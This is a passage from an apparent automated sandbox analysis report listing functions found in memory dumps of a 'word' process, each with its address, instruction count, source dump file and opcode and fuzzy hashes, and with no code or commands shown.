                        Uniqueness Score: -1.00%

                        Function 00C68AA7 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5d627cb76b01f06f4ee8100a792a7e96f88e36bc1ea6bd9a1b4e1ade93ed2382
                        • Instruction ID: 563f15308300a1d2d4f10901c96e996034b9846824f70a727e9fe52ed9991d33
                        • Opcode Fuzzy Hash: 5d627cb76b01f06f4ee8100a792a7e96f88e36bc1ea6bd9a1b4e1ade93ed2382
                        • Instruction Fuzzy Hash: 64D0C76414D7815FC346C625CCA1812BFB19FD7110718C0DB9485C7657CA35DC4BC752
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C62B28 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 293fd9f19b7ccffdf554910b6ec422b99922ada63c90d6f21205e3e5ac46810a
                        • Instruction ID: 505e6dab9b171471a92e77772610281aeb116fc9c5943b04932e4dfaf1559430
                        • Opcode Fuzzy Hash: 293fd9f19b7ccffdf554910b6ec422b99922ada63c90d6f21205e3e5ac46810a
                        • Instruction Fuzzy Hash: 9FD0127134401417F614A648F862BC7224DDB84B04F104065F1029F7C5C9A4AC4183D9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B6078 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8a2887f7b3861b499dd1740139271c074658dd577aca25dbb34383a68741606e
                        • Instruction ID: d46f85214b4314e79c261d437d0abba8fb616ad84259a1888044f5b3c84d8e47
                        • Opcode Fuzzy Hash: 8a2887f7b3861b499dd1740139271c074658dd577aca25dbb34383a68741606e
                        • Instruction Fuzzy Hash: A7D0C9722081615F8254CA59E950D6BFBED9FCD910B18888FB494D3241C965DD06CBB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BD671 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 44008e2404a040d435d853907dde7e5514c25e7daed45ec86b42aec974401ca6
                        • Instruction ID: 04c704908d52cd5e8ee732db8f0765b42bc06d8a1c386ab7662e086dc2f1949f
                        • Opcode Fuzzy Hash: 44008e2404a040d435d853907dde7e5514c25e7daed45ec86b42aec974401ca6
                        • Instruction Fuzzy Hash: CDD0A9725052409FC3428B208840802FBB0EF9B20079AC4CBE4098B222DA39AA07C728
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B4B62 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94aa83b4b69b3275098087c870b8e1e131a1404e489ee533e4da616fc2f6a15a
                        • Instruction ID: 9c3532f8a1c53c534f6ca6fea0b459876b948222961ed041ece482b77a7ccb43
                        • Opcode Fuzzy Hash: 94aa83b4b69b3275098087c870b8e1e131a1404e489ee533e4da616fc2f6a15a
                        • Instruction Fuzzy Hash: C3D0C9687091C05FC70A8B688822094BFA24E8B10431DC5EA9198CB3A3CA129D47D750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C64C93 Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07bb64f878102affda2bdbef95c82265a719e9ab062298ad6fbfbb13024aa629
                        • Instruction ID: 0fa2c1b139fdfa5732b47b93a9a2905ef43e3cea79ae37aba05cdfd3cc9b585d
                        • Opcode Fuzzy Hash: 07bb64f878102affda2bdbef95c82265a719e9ab062298ad6fbfbb13024aa629
                        • Instruction Fuzzy Hash: 38D022B240B291428B3D4F3C9A4D2A63F48DA533367A4878FD0718B8E3C314C2D7B202
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6BE38 Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fa980bd858f8337dc9121b1c569f59aec1f69aa6ecd436ba38436982f3fb1631
                        • Instruction ID: 613a1bd0d10c3d052af9d150b3918987d67e14e259391c91a18949314c79fe3a
                        • Opcode Fuzzy Hash: fa980bd858f8337dc9121b1c569f59aec1f69aa6ecd436ba38436982f3fb1631
                        • Instruction Fuzzy Hash: 23D052343456826BC315C628C842A12FBA19F88204F18C8BCA148CB6A7CE3AC80AD745
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60810 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f7452d4c47d8385f447f3b12cbd478d81780a9d3c715953f431b7245a120f16
                        • Instruction ID: 3e38fa578c1a345bb689e753b2b16b84f30614a61e0db722775a0b17ee9be468
                        • Opcode Fuzzy Hash: 8f7452d4c47d8385f447f3b12cbd478d81780a9d3c715953f431b7245a120f16
                        • Instruction Fuzzy Hash: D4C08C314492006EC7B9A3F4B8687DE7F50B707359F26070AE489924A2C76201C8CA6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BB8EB Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a926653f81c0c60341e6d484fa4201b31b908537b921d9c3d89d05ff27d492fb
                        • Instruction ID: 5c2978b5e9cc93866ccdd1830e33c1f6d9a02f1fb279cce04f15a9934cfc9253
                        • Opcode Fuzzy Hash: a926653f81c0c60341e6d484fa4201b31b908537b921d9c3d89d05ff27d492fb
                        • Instruction Fuzzy Hash: D6D0C9307082809FC306CB29C868821BFF1AF9B215719C4EEA488CB367DA31EC43DB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C682B0 Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d2eaff9b0bbe1e3163d2eb5b3fd438a9dc598efb7fb90b670f2817ec0cd44f6
                        • Instruction ID: 36994c47b6edb939c15e7a96fadf7af6b763967905d83c7bc2818684e11cc62c
                        • Opcode Fuzzy Hash: 9d2eaff9b0bbe1e3163d2eb5b3fd438a9dc598efb7fb90b670f2817ec0cd44f6
                        • Instruction Fuzzy Hash: AAD0C92135E2C04FD346CB2488A6584BF629F9710471C84DAD584DB257D9258817D729
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B7380 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c9c6ff6ec4daa7221b90238ebf442ec147a78de8a571f40194d089345d5e567
                        • Instruction ID: 052f16b405507ac9f0651184d0a41b3bb0c8d7d7be4242e611a876af1e722290
                        • Opcode Fuzzy Hash: 7c9c6ff6ec4daa7221b90238ebf442ec147a78de8a571f40194d089345d5e567
                        • Instruction Fuzzy Hash: 44C04C1845D6D14ECF031F3409281947F30DE77205B0A16C6D0D1CF553C400944AFB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B7BD0 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dcc85b5be13d4c28a6d7d549ab1cedc253a6d059c140f8f868628d18255c8b43
                        • Instruction ID: b9c6e772edc85a963fe5bb4f7fdf11fc99b2ba6337f851688411a5e7e571db58
                        • Opcode Fuzzy Hash: dcc85b5be13d4c28a6d7d549ab1cedc253a6d059c140f8f868628d18255c8b43
                        • Instruction Fuzzy Hash: 5EC08C6110E1C04FC3029364C8A4040BFB1AF4B10831988CBE484CF2BBC616DE07D712
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60818 Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 68808fefb64144645b0bad1dab8865bd0d216b9f7a635f41c75ae1c60c1798f7
                        • Instruction ID: 4671f1e35b9476f8d209b47d51cf0089bf3f0ed9fbf3007b0c147cf558ea48ee
                        • Opcode Fuzzy Hash: 68808fefb64144645b0bad1dab8865bd0d216b9f7a635f41c75ae1c60c1798f7
                        • Instruction Fuzzy Hash: FBB092300496088AC27867D8B84836E7A98F70A31AF540310E65C524A2CB7654A4C5EA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C64CB3 Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1553f72a6516148b24927cbd39ff27bd7abb5ade84cab45285e349502e368c36
                        • Instruction ID: 8357af5be4501d2675bf91a710dff5bab7be37dc5a4446c6cf141719b7283567
                        • Opcode Fuzzy Hash: 1553f72a6516148b24927cbd39ff27bd7abb5ade84cab45285e349502e368c36
                        • Instruction Fuzzy Hash: 4AC04C75009206EEC7449F61D84895BBBE8AB58395F108C29A186C2160D7308094EB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B5310 Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7fbcb63472128d0a210ea9036b863d07e77fffc7870fc97c2ca3b239b1a2b54e
                        • Instruction ID: 39a73c9bbe3c0ed7792a8b53aabb37d2f4b2636dfcf14e288d4917beaa58d51d
                        • Opcode Fuzzy Hash: 7fbcb63472128d0a210ea9036b863d07e77fffc7870fc97c2ca3b239b1a2b54e
                        • Instruction Fuzzy Hash: 35C04C753415025BD354C618C851A26F7A6DFD8315F14C47D6449C7759DE36DC03D614
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B7400 Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6672f1d7ecefa4f18042d922e87e5f35cfd92ec000c9cf41cc446dacd6a65754
                        • Instruction ID: d1c110f1bb7bbf0d513e018c8426d95b7504e9ba950a41a830870840636d39cb
                        • Opcode Fuzzy Hash: 6672f1d7ecefa4f18042d922e87e5f35cfd92ec000c9cf41cc446dacd6a65754
                        • Instruction Fuzzy Hash: B1C08C2E41D2C00EEF0B8B3409506843F218E6A20270941C6C0819F223C5044045A751
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C698A0 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6AE88 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B73AF Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 332d54a53ab72c4ad37ccb2f285c9709895a0959e35222ff4cdeea9f3b59434a
                        • Instruction ID: 84bc010684e81da08180445d50c66c77588c25440b682a0c295ae9aba9511f43
                        • Opcode Fuzzy Hash: 332d54a53ab72c4ad37ccb2f285c9709895a0959e35222ff4cdeea9f3b59434a
                        • Instruction Fuzzy Hash: 93C048382894449FC740CB69D599C98BFA0AF5A22832981DDE40ECBB73C662E802CE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B73B0 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                        • Instruction ID: 4a00f5dc1a4745342057266f99d99f8343528934673bb8150e6a530dc89bb7bf
                        • Opcode Fuzzy Hash: 778481114c374013f58dd504163b08aecaedb20851cd843d8b2e6942ade4442f
                        • Instruction Fuzzy Hash: 71C09238250208CFC340DB59D589C10BBE8EF49A2835980D8E50D8B733CB32FC01CA80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B78B8 Relevance: .0, Instructions: 8COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C64A40 Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c75d1f359baf881aebbd545750fb125bd9c5c0c39637b878c602c40b716e62d
                        • Instruction ID: c33795987177c21f5cbdac8c9888cd4206e67c0f7a04de651ea4cb362d1e97b6
                        • Opcode Fuzzy Hash: 7c75d1f359baf881aebbd545750fb125bd9c5c0c39637b878c602c40b716e62d
                        • Instruction Fuzzy Hash: 29B092301502088FC200DA58D444C4077A8BB08A0430100D0E2088B232D622F8008A40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C64A3F Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dac695a504d52441e3e9bf023128c88c829bf2d0575426c74522b77d97f6d110
                        • Instruction ID: 39755b1fa162cafa71ac8f420b43babd74ef871d793fa62132967fd3774e7e91
                        • Opcode Fuzzy Hash: dac695a504d52441e3e9bf023128c88c829bf2d0575426c74522b77d97f6d110
                        • Instruction Fuzzy Hash: 62B092341885448FC700CB78D484C887FA0BF1920431501D9E10ACB632D262D8008E00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B72FF Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 43fbd7198a960a2e6fefe79bcae40bd23e08525254a326f4f3cae3710f288c22
                        • Instruction ID: 726efb66c1b33969e9f61b91f6a59893d17cd8fcba1a7a0dc47ba4a991849e77
                        • Opcode Fuzzy Hash: 43fbd7198a960a2e6fefe79bcae40bd23e08525254a326f4f3cae3710f288c22
                        • Instruction Fuzzy Hash: 5DB09288888002C9C6802F94892C3D2BBB1FF00204FAA02B05D040B90AE22A05956348
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B4B70 Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                        • Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
                        • Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                        • Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C69FB0 Relevance: .0, Instructions: 5COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B0470 Relevance: .0, Instructions: 5COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                        • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                        • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C67262 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C63680 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6EB20 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C67F02 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B3302 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BD0E2 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                        Uniqueness

                        Uniqueness Score: -1.00%

